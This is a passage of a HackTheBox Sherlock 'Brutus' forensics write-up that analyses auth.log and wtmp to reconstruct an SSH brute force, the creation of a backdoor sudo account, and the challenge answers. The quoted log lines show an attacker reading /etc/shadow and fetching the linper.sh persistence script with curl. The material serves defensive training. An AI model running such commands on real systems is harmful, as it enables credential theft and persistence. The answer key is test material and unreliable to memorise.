From this, we’ll identify the most active contributors to the log, primarily SSH and CRON, along with other potentially interesting Unix commands, which ew’ll investigate further.

motasem@kali$ cat auth.log | cut -d' ' -f 6 | cut -d[ -f1 | sort | uniq -c | sort -nr  
    257 sshd  
    104 CRON  
      8 systemd-logind  
      6 sudo:  
      3 groupadd  
      2 usermod  
      2 systemd:  
      1 useradd  
      1 passwd  
      1 chfn

To analyze SSH activity, we’ll use the command cat auth.log | grep sshd | less to filter and view only SSH-related events. The logs begin with a successful root login. Shortly afterward, there is a sequence of failed login attempts from the IP address 65.2.161.68. These logs indicate attempts to log in as the user “admin,” which does not exist on the system.

Mar  6 06:19:52 ip-172-31-35-28 sshd[1465]: AuthorizedKeysCommand /usr/share/ec2-instance-connect/eic_run_authorized_keys root SHA256:4vycLsDMzI+hyb9OP3wd18zIpyTqJmRq/QIZaLNrg8A failed, status 22  
Mar  6 06:19:54 ip-172-31-35-28 sshd[1465]: Accepted password for root from 203.101.190.9 port 42825 ssh2  
Mar  6 06:19:54 ip-172-31-35-28 sshd[1465]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)

The failed login attempts occur between 06:31:33 and 06:31:42, suggesting the use of a brute force tool or script, as a human typist could not input attempts so quickly. By using grep with the term “Failed,” we can extract the full range of failed login events.

Mar  6 06:31:31 ip-172-31-35-28 sshd[2325]: Invalid user admin from 65.2.161.68 port 46380  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2325]: Received disconnect from 65.2.161.68 port 46380:11: Bye Bye [preauth]  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2325]: Disconnected from invalid user admin 65.2.161.68 port 46380 [preauth]  
Mar  6 06:31:31 ip-172-31-35-28 sshd[620]: error: beginning MaxStartups throttling  
Mar  6 06:31:31 ip-172-31-35-28 sshd[620]: drop connection #10 from [65.2.161.68]:46482 on [172.31.35.28]:22 past MaxStartups  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2327]: Invalid user admin from 65.2.161.68 port 46392  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2327]: pam_unix(sshd:auth): check pass; user unknown  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2327]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.2.161.68   
Mar  6 06:31:31 ip-172-31-35-28 sshd[2332]: Invalid user admin from 65.2.161.68 port 46444  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2331]: Invalid user admin from 65.2.161.68 port 46436  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2332]: pam_unix(sshd:auth): check pass; user unknown  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2332]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.2.161.68   
Mar  6 06:31:31 ip-172-31-35-28 sshd[2331]: pam_unix(sshd:auth): check pass; user unknown  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2331]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.2.161.68   
Mar  6 06:31:31 ip-172-31-35-28 sshd[2330]: Invalid user admin from 65.2.161.68 port 46422  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2337]: Invalid user admin from 65.2.161.68 port 46498  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2328]: Invalid user admin from 65.2.161.68 port 46390  
Mar  6 06:31:31 ip-172-31-35-28 sshd[2335]: Invalid user admin from 65.2.161.68 port 46460

To further analyze, I’ll use cut and grep to create a histogram of the attempted login usernames. This involves isolating the username portion, which may either be a single word or prefixed with “invalid user.” To handle this, we’ll manipulate the string with cut and reverse it to capture the data accurately.

motasem@kali$ cat auth.log | grep Failed | cut -d: -f4 | cut -d' ' -f5- | rev | cut -d' ' -f6- | rev | sort | uniq -c | sort -nr  
     12 invalid user server_adm  
     11 invalid user svc_account  
     10 invalid user admin  
      9 backup  
      6 root

This analysis reveals that the attacker attempted five different usernames and identified two valid ones.

At this stage, it appears reasonable to conclude that the attacker’s IP address is 65.2.161.68.

Once we determine the timeframe of the brute force attack, it’s essential to review all the logs within that period to identify any successful attempts. Previously, we noticed that a successful SSH login message began with “Accepted password for.” we’ll use grep to search for that pattern.

motasem@kali$ cat auth.log | grep Accepted   
Mar  6 06:19:54 ip-172-31-35-28 sshd[1465]: Accepted password for root from 203.101.190.9 port 42825 ssh2  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2  
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2  
Mar  6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2

The search reveals four successful logins, with the second one occurring near the end of the brute force activity targeting the root user. Reviewing logs from that time shows related entries. Specifically, there’s a successful login as root followed immediately by a disconnect within the same second. The logs include multiple disconnection entries, but it’s worth noting that the connection for root occurs on port 34782, and the corresponding disconnect for that port appears 12 lines later amidst ongoing brute force attempts.

Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)  
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2379]: Received disconnect from 65.2.161.68 port 46698:11: Bye Bye [preauth]  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2379]: Disconnected from invalid user server_adm 65.2.161.68 port 46698 [preauth]  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2380]: Received disconnect from 65.2.161.68 port 46710:11: Bye Bye [preauth]  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2380]: Disconnected from invalid user server_adm 65.2.161.68 port 46710 [preauth]  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2387]: Connection closed by invalid user svc_account 65.2.161.68 port 46742 [preauth]  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2423]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.2.161.68  user=backup  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2424]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.2.161.68  user=backup  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2389]: Connection closed by invalid user svc_account 65.2.161.68 port 46744 [preauth]  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2391]: Connection closed by invalid user svc_account 65.2.161.68 port 46750 [preauth]  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Received disconnect from 65.2.161.68 port 34782:11: Bye Bye  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Disconnected from user root 65.2.161.68 port 34782  
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session closed for user root  
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: Session 34 logged out. Waiting for processes to exit.  
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: Removed session 34.

This pattern aligns with behavior typical of brute force tools like Hydra or NetExec, which test for success or failure and log successful attempts for later use by the attacker.

In this case, the account successfully brute forced was root.

Root Session Analysis

The logs indicate a successful root authentication at 06:32:44. At that time, there are only three logs, and the session ID for the root user is 37. A review of the wtmp file using wtmpdump reveals that the third-to-last row is a type 7 event (USER_PROCESS), where root logged in from the attacker’s IP at 06:32:45—one second after the successful authentication noted in auth.log. The timestamp of this event is the answer to Task 3.

Mar 6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2

Mar 6 06:32:44 ip-172-31-35-28 sshd[2491]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)

Mar 6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root

Other log types observed in auth.log—besides SSH and cron—include sudo, groupadd, usermod, systemd, useradd, passwd, and chfn. To address Task 5, attention is focused on useradd logs. At 06:34:18, four log entries indicate the creation of the cyberjunkie user and group. Shortly afterward, the user’s password is set.

Skipping over some cron activities, logs show that less than a minute later, usermod is used to add cyberjunkie to the sudo group. The sudo group allows users to execute any command as root using sudo. Consequently, cyberjunkie is the answer to Task 5.

motasem@kali$ utmpdump wtmp   
Utmp dump of wtmp  
[2] [00000] [~~  ] [reboot  ] [~           ] [6.2.0-1017-aws      ] [0.0.0.0        ] [2024-01-25T11:12:17,804944+00:00]  
[5] [00601] [tyS0] [        ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-01-25T11:12:31,072401+00:00]  
[6] [00601] [tyS0] [LOGIN   ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-01-25T11:12:31,072401+00:00]  
[5] [00618] [tty1] [        ] [tty1        ] [                    ] [0.0.0.0        ] [2024-01-25T11:12:31,080342+00:00]  
[6] [00618] [tty1] [LOGIN   ] [tty1        ] [                    ] [0.0.0.0        ] [2024-01-25T11:12:31,080342+00:00]  
[1] [00053] [~~  ] [runlevel] [~           ] [6.2.0-1017-aws      ] [0.0.0.0        ] [2024-01-25T11:12:33,792454+00:00]  
[7] [01284] [ts/0] [ubuntu  ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-01-25T11:13:58,354674+00:00]  
[8] [01284] [    ] [        ] [pts/0       ] [                    ] [0.0.0.0        ] [2024-01-25T11:15:12,956114+00:00]  
[7] [01483] [ts/0] [root    ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-01-25T11:15:40,806926+00:00]  
[8] [01404] [    ] [        ] [pts/0       ] [                    ] [0.0.0.0        ] [2024-01-25T12:34:34,949753+00:00]  
[7] [836798] [ts/0] [root    ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-02-11T10:33:49,408334+00:00]  
[5] [838568] [tyS0] [        ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-02-11T10:39:02,172417+00:00]  
[6] [838568] [tyS0] [LOGIN   ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-02-11T10:39:02,172417+00:00]  
[7] [838962] [ts/1] [root    ] [pts/1       ] [203.101.190.9       ] [203.101.190.9  ] [2024-02-11T10:41:11,700107+00:00]  
[8] [838896] [    ] [        ] [pts/1       ] [                    ] [0.0.0.0        ] [2024-02-11T10:41:46,272984+00:00]  
[7] [842171] [ts/1] [root    ] [pts/1       ] [203.101.190.9       ] [203.101.190.9  ] [2024-02-11T10:54:27,775434+00:00]  
[8] [842073] [    ] [        ] [pts/1       ] [                    ] [0.0.0.0        ] [2024-02-11T11:08:04,769514+00:00]  
[8] [836694] [    ] [        ] [pts/0       ] [                    ] [0.0.0.0        ] [2024-02-11T11:08:04,769963+00:00]  
[1] [00000] [~~  ] [shutdown] [~           ] [6.2.0-1017-aws      ] [0.0.0.0        ] [2024-02-11T11:09:18,000731+00:00]  
[2] [00000] [~~  ] [reboot  ] [~           ] [6.2.0-1018-aws      ] [0.0.0.0        ] [2024-03-06T06:17:15,744575+00:00]  
[5] [00464] [tyS0] [        ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,354378+00:00]  
[6] [00464] [tyS0] [LOGIN   ] [ttyS0       ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,354378+00:00]  
[5] [00505] [tty1] [        ] [tty1        ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,469940+00:00]  
[6] [00505] [tty1] [LOGIN   ] [tty1        ] [                    ] [0.0.0.0        ] [2024-03-06T06:17:27,469940+00:00]  
[1] [00053] [~~  ] [runlevel] [~           ] [6.2.0-1018-aws      ] [0.0.0.0        ] [2024-03-06T06:17:29,538024+00:00]  
[7] [01583] [ts/0] [root    ] [pts/0       ] [203.101.190.9       ] [203.101.190.9  ] [2024-03-06T06:19:55,151913+00:00]  
[7] [02549] [ts/1] [root    ] [pts/1       ] [65.2.161.68         ] [65.2.161.68    ] [2024-03-06T06:32:45,387923+00:00]  
[8] [02491] [    ] [        ] [pts/1       ] [                    ] [0.0.0.0        ] [2024-03-06T06:37:24,590579+00:00]  
[7] [02667] [ts/1] [cyberjunkie] [pts/1       ] [65.2.161.68         ] [65.2.161.68

Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/group: name=cyberjunkie, GID=1002  
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/gshadow: name=cyberjunkie  
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002  
Mar  6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts  
Mar  6 06:34:26 ip-172-31-35-28 passwd[2603]: pam_unix(passwd:chauthtok): password changed for cyberjunkie  
Mar  6 06:34:31 ip-172-31-35-28 chfn[2605]: changed user 'cyberjunkie' information

Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'  
Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to shadow group 'sudo'

“Create Account” is a persistence technique listed in the MITRE ATT&CK matrix. The specific identifier for creating a local account is T1136.001 (Task 6).

The session disconnects shortly afterward, with the total session duration recorded as 06:32:45 to 06:37:24, amounting to 279 seconds (Task 7).

Cyberjunkie Session Analysis

The auth.log file shows another successful authentication by the newly created user, cyberjunkie, at 06:37:34, with wtmp confirming the session began one second later.

Mar  6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2  
Mar  6 06:37:34 ip-172-31-35-28 sshd[2667]: pam_unix(sshd:session): session opened for user cyberjunkie(uid=1002) by (uid=0)  
Mar  6 06:37:34 ip-172-31-35-28 systemd-logind[411]: New session 49 of user cyberjunkie.  
Mar  6 06:37:34 ip-172-31-35-28 systemd: pam_unix(systemd-user:session): session opened for user cyberjunkie(uid=1002) by (uid=0)

After logging in, the user performs a few actions recorded in auth.log. At 06:37:57, they use sudo to print the contents of the /etc/shadow file, which contains password hashes for system users.

Mar  6 06:37:57 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow  
Mar  6 06:37:57 ip-172-31-35-28 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by cyberjunkie(uid=1002)  
Mar  6 06:37:57 ip-172-31-35-28 sudo: pam_unix(sudo:session): session closed for user root

Approximately a minute later, they download the script linper.sh from GitHub using the command:

Mar  6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh  
Mar  6 06:39:38 ip-172-31-35-28 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by cyberjunkie(uid=1002)  
Mar  6 06:39:39 ip-172-31-35-28 sudo: pam_unix(sudo:session): session closed for user root

Attack Timeline

Here’s the timeline summarized and organized:

Time (UTC)Event DescriptionSource06:18:01First log entry recordedauth.log06:31:33SSH brute force attack beginsauth.log06:31:40Successful SSH login as rootauth.log06:31:42SSH brute force attack endsauth.log06:32:44Root user logs in via SSHauth.log06:32:45Root terminal session initiatedwtmp06:34:18“cyberjunkie” user and group createdauth.log06:35:15“cyberjunkie” added to the sudo groupauth.log06:37:24Root session disconnectsauth.log06:37:34“cyberjunkie” logs in via SSHauth.log06:37:35“cyberjunkie” terminal session initiatedwtmp06:37:57“cyberjunkie” accesses /etc/shadow fileauth.log06:39:38“cyberjunkie” downloads linper.shauth.log06:41:01Final log entry recordedauth.log

HackTheBox Sherlock Brutus Questions and answers

Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?

65.2.161.68

The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?

root

Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?

2024–03–06 06:32:45

SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?

The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?

cyberjunkie

What is the MITRE ATT&CK sub-technique ID used for persistence?

T1136.001

How long did the attacker’s first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)

279

The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?

/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh

DEV Community: Motasem Hamdan

TryHackMe GeoServer's XXE 2025 Walkthrough

What This Vulnerability Really Tests

Enumeration Methodology

Commands Cheat Sheet

Common Mistakes

Tool Usage Patterns

Security Lesson & Mitigation

Expert Hints

Certifications Prep Suggestions

TryHackMe Room Answers

SSTI Explained: HTB Hacknet Writeup

Phase 1: Behavioral Reconnaissance

Phase 2: Server-Side Template Injection

Phase 3: Race Conditions & Serialization

Phase 4: Post-Exploitation Forensics

Why SSTI Was the Silent Killer of 2025

Certification Roadmap

Why I Quit Chasing The Cyber Security Dream

Networking Over Certs

Learning Resources Are Often Misleading

Ultimate HTB CPTS 2026 Notes: The Complete Study Guide

Comprehensive Information Gathering & Network Enumeration

Deep Dive into Active Directory Exploitation

Web Application Penetration Testing Mastery

Privilege Escalation and Post-Exploitation

Access a Preview Below

Start Below

Click Here to Buy the Full HTB CPTS Notes Book Now

From Stored XSS to RCE | HackTheBox Imagery Writeup

Note:

Here is the TL;DR of the kill chain:

HackTheBox Sherlock Brutus Writeup

Introduction

HackTheBox Sherlock Brutus Description

HackTheBox Sherlock Brutus Questions

Analysis

Analyzing auth.log

Analyzing wtmp

SSH Brute Force Analysis

Root Session Analysis

Cyberjunkie Session Analysis

Attack Timeline

HackTheBox Sherlock Brutus Questions and answers

You can also watch: